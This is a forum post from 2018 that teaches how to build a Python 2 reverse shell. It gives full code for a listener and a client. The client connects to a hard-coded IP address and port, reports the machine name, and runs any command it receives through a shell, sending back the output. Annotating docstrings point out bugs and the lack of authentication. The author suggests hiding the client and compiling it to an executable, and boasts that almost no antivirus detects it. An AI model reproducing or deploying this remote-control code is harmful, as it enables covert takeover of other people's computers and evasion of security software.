How to make Python Reverse Shell

emocion

How to make Python Reverse Shell

Postby emocion » Tue Aug 21, 2018 3:58 pm

First we create the server: create a Python script named server.py and put this code in it (make any changes you want):


import socket, os, sys
def socketCreate():
    """Create the listening TCP socket and read the port to listen on from stdin.

    Sets the module globals ``host``, ``port`` and ``s``. ``host`` is '' so the
    later bind() covers every local address. Python 2 only: raw_input, the
    print statement and socket.error indexed as msg[0].
    """
    try:
        global host
        global port
        global s
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        host = ''
        port = raw_input('Type the port for listening: ')
        if port == '':
            # Empty input re-prompts recursively; because ``port`` is global,
            # the outer call then sees whatever the inner call stored.
            socketCreate()
        # Non-numeric input raises ValueError here, which the handler below
        # (socket.error only) does not catch.
        port = int(port)
    except socket.error as msg:
        print 'Socket creation error: ' + str(msg[0])
def socketBind():
    """Bind the global socket ``s`` to (host, port) and listen with a backlog of 1.

    On socket.error the message is printed and the function calls itself
    again immediately: there is no delay and no attempt limit, so a port
    that stays unavailable means unbounded recursion.
    """
    try:
        print 'Binding socket at port %s'%(port)
        s.bind((host,port))
        s.listen(1)
    except socket.error as msg:
        print 'Socket binding error: ' + str(msg[0])
        print 'Retrying...'
        socketBind()
def socketAccept():
    """Block until one client connects, then hand control to menu().

    Sets the globals ``conn``, ``addr`` and ``hostname``. There is no
    authentication: whichever peer connects first is accepted, and its
    first message (up to 1024 bytes) is taken verbatim as the hostname
    shown in the prompt. The except message reuses the 'binding' wording
    from socketBind even though this is the accept step.
    """
    global conn
    global addr
    global hostname
    try:
        conn, addr = s.accept()
        print '[!] Session opened at %s:%s'%(addr[0],addr[1])
        print '\n'
        hostname = conn.recv(1024)
        menu()
    except socket.error as msg:
        print 'Socket binding error: ' + str(msg[0])
def menu():
    """Operator loop: read a line, send it to the client, print the reply.

    Everything crosses the socket as plain text with no encryption or
    integrity check. ``cmd == quit`` compares the input string against the
    builtin ``quit`` helper object (from the site module), not the string
    'quit', so the close/exit branch is never reached. Replies equal to the
    hostname are not printed. ``<>`` is Python 2 syntax.
    """
    while 1:
        cmd = raw_input(str(addr[0])+'@' + str(hostname) + '> ')
        if cmd == quit:
            conn.close()
            s.close()
            sys.exit()
        command = conn.send(cmd)  # send() returns the byte count; value unused
        result = conn.recv(16834)  # single recv; longer replies are truncated
        if result <> hostname:
            print result
def main():
    """Run the three setup steps in order: create, bind, accept (which then loops in menu())."""
    socketCreate()
    socketBind()
    socketAccept()
# Runs on import as well as execution: there is no ``if __name__ == '__main__'`` guard.
main()


Then we create client.py with this code:


import socket, os, subprocess
def connect():
    """Open a TCP connection to the hard-coded server and send this machine's name.

    Sets the globals ``host``, ``port`` and ``s``. The first bytes written to
    the socket are the COMPUTERNAME environment variable (Windows) in plain
    text. The bare ``except`` swallows every failure - connection refused,
    KeyError from os.environ, KeyboardInterrupt - prints one line and
    returns, so execution continues as if connected.
    """
    os.system('cls')  # clear the console (Windows cmd builtin)
    global host
    global port
    global s
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    port = 4444 #port it will connect to
    host = '192.168.0.100' #IP address it will connect to
    try:
        print '[!] Trying to connect to %s:%s'%(host,port)
        s.connect((host,port))
        print '[!] Connection established'
        s.send(os.environ['COMPUTERNAME'])
    except:
        print 'Could not connect'
def recieve():
    """Read one message from the server, run it through a shell, send the output back.

    Whatever arrives (up to 1024 bytes) is passed verbatim to
    subprocess.Popen(shell=True): arbitrary remote command execution with no
    authentication or validation of the sender. On "quit" the ``s.close``
    attribute is referenced but not called (no parentheses), so the socket
    stays open, and ``args`` is unbound when send(args) runs. send() calls
    recieve() again, so every command deepens the mutual recursion. Reading
    stdout to EOF before stderr can block if the child fills the stderr
    pipe first.
    """
    recieve = s.recv(1024)  # local shadows this function's own name
    if recieve == "quit":
        s.close
    else:
        proc2 = subprocess.Popen(recieve[0:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)  # [0:] is a full copy, same bytes as recieve
        stdout_value = proc2.stdout.read() + proc2.stderr.read()
        args = 'otp: ' + stdout_value
    send(args)
def send(args):
    """Write ``args`` to the server socket, then wait for the next command via recieve()."""
    send = s.send(args)  # local shadows this function's own name; byte count unused
    recieve()
# Script body: connect, then enter the recieve()/send() loop. s.close() is
# only reached if that loop returns; it raises NameError if connect() never
# got as far as creating ``s``.
connect()
recieve()
s.close()


You need to set the port and the IP address of the listening server in the client. You can also make the client hide itself and compile it into an executable, but I do not need that. The most interesting thing is that, as it is now, almost no antivirus detects it :)

All you have to do is run the server, enter a port for it to listen on, then run the client on one of your devices and test it.
